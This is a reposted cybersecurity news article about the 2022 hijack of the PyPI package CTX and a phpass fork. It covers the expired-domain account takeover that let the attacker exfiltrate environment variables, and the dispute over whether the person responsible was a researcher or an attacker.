Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Security ‘researcher’ hits back against claims of malicious CTX file uploads

A ‘security researcher’ accused of unethical activity through the alleged hijack of a popular open source project insists that their actions were not malicious.

Last week, as previously reported by The Daily Swig, social media users alerted the Python Package Index (PyPI) repository to a potentially malicious or hijacked package, CTX.

On May 22, Reddit user SocketPuppets promoted the package online, claiming it had received an update after lying dormant for roughly eight years.

The CTX Python library was available on both GitHub and PyPI. However, it wasn’t long before participants on a Reddit thread highlighted that the GitHub package had not been updated at the same time as the PyPI repository.

To make matters worse, the individual responsible also allegedly compromised a different package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.’

Domain takeover

With an estimated three million downloads combined, the Python packages had been tampered with to send environmental variables – such as AWS keys – to an external URL leading to a Heroku app.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method had been added after a perpetrator purchased a domain name for the expired email address used by the original developer, sent themselves a recovery password, and took over the account.

Users who installed the package between May 14 and May 22, 2022, may have had linked environmental variables and credentials compromised.

SocketPuppets (account since deleted) tried to defend their actions, claiming the unusual activity was due to a “new company account”.

The individual accused of the activity, then published a Medium blog post to share their “side of the story”.

“All this research DOES NOT contain any malicious activity,” Aydin said. “I want to show how this simple attack affects +10M users and companies. ALL THE DATA THAT I RECEIVED IS DELETED AND NOT USED.”

‘Never responsibly disclosed’

According to Aydin, a ‘scraper tool’ and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he sent a report to the bug bounty platform HackerOne on May 15 that was closed as a duplicate a day later.

Their HackerOne profile does not appear to show an associated bug report.

Advertisement. Scroll to continue reading.

Speaking to The Daily Swig, Sangwan said that the vulnerability “was never responsibly disclosed”, and “this was an actual attack”.

Sangwan added: “After taking over the package, the attacker posted about it on Reddit… and when other users started getting suspicious and I discovered another package they had compromised. The attacker came out and claimed that he did it for ‘research’.

“Replacing a popular software with a backdoored version that steals password[s] of people is anything but research.”

Source: https://portswigger.net/daily-swig/security-researcher-hits-back-against-claims-of-malicious-ctx-file-uploads

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies three weeks to secure Adobe ColdFusion servers on their networks against two...

Cyber Security

Businesses and developers are focusing more on the security of applications in their digital environment as cyber threats and data breaches continue escalating. The...

Cyber Security

HCL BigFix is an endpoint management platform that has the capability to automate discovery, management, and remediation. It can find and fix vulnerabilities on...

Cyber Security

The Environmental Protection Agency cited a lack of resources and the sheer volume of critical vulnerabilities as the reasons for its inability to patch...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO